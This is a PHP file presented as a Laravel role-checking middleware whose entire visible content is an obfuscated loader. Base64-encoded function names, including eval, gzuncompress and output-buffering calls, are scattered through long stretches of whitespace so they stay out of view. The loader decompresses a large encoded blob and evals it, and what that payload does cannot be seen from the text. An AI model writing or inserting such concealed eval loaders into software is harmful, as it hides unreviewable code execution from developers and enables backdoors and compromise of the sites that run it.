<?php 
        $__='printf';$_='Loading app/Http/Middleware/HasRoleMiddleware.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
